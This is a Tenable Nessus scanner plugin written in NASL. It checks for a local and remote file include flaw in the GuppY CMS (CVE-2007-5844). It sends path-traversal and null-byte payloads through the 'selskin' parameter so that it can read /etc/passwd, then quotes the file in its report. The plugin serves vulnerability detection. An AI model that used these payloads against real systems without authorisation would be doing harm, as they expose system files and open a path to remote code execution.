#
# (C) Tenable Network Security, Inc.
#


  desc = "
Synopsis :

The remote web server contains a PHP application that is susceptible
to local and remote file include attacks. 

Description :

The remote host is running GuppY, a content management system written
in PHP. 

The version of GuppY installed on the remote host fails to sanitize
user input to the 'selskin' parameter before using it to include PHP
code.  Regardless of PHP's 'register_globals' setting, an
unauthenticated remote attacker may be able to exploit this issue to
view arbitrary files on the remote host or to execute arbitrary PHP
code, possibly taken from third-party hosts. 

Note that successful exploitation of the remote file include issue
requires that PHP's 'magic_quotes_gpc' setting be disabled. 

See also :

http://www.milw0rm.com/exploits/4602

Solution :

Unknown at this time. 

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";


if (description)
{
  script_id(27620);
  script_version("$Revision: 1.3 $");

  script_cve_id("CVE-2007-5844");
  script_bugtraq_id(26315);
  script_xref(name:"OSVDB", value:"38491");

  script_name(english:"GuppY selskin Parameter File Include Vulnerability");
  script_summary(english:"Tries to read a local file with GuppY");

  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


file = "/etc/passwd";
if (thorough_tests) 
{
  exploits = make_list(
    string("../inc/boxleft.inc%00&xposbox[L][]=", file, "%00"),
    string("../../../../../../../../../..", file, "%00")
  );
}
else 
{
  exploits = make_list(
    string("../inc/boxleft.inc%00&xposbox[L][]=", file, "%00")
  );
}


# Loop through directories.
if (thorough_tests) dirs = make_list("/guppy", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  foreach exploit (exploits)
  {
    # Try to retrieve a local file.
    exploit = str_replace(find:'/', replace:"%2F", string:exploit);

    req = http_get(item:string(dir, "/index.php?selskin=", exploit), port:port);
    res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
    if (res == NULL) exit(0);

    # There's a problem if...
    if (
      # there's an entry for root or...
      egrep(pattern:"root:.*:0:[01]:", string:res) ||
      # we get an error because magic_quotes was enabled or...
      string("main(", file, ".inc): failed to open stream") >< res ||
      # we get an error claiming the file doesn't exist or...
      string("main(", file, "): failed to open stream: No such file") >< res ||
      # we get an error about open_basedir restriction.
      string("open_basedir restriction in effect. File(", file) >< res
    )
    {
      if (egrep(string:res, pattern:"root:.*:0:[01]:"))
      {
        contents = res - strstr(res, "<!DOCTYPE");
        if ('</div' >< contents) contents = contents - strstr(contents, '</div');
        if ('<div ' >< contents && '>' >< contents) contents = strstr(contents, '>') - '>';
      }
      else contents = "";

      if (contents)
      {
        report = string(
          desc,
          "\n\n",
          "Plugin output :\n",
          "\n",
          "Here are the contents of the file '/etc/passwd' that Nessus\n",
          "was able to read from the remote host :\n",
          "\n",
          contents
        );
      }
      else report = desc;

      security_hole(port:port, data:report);
      exit(0);
    }
  }
}
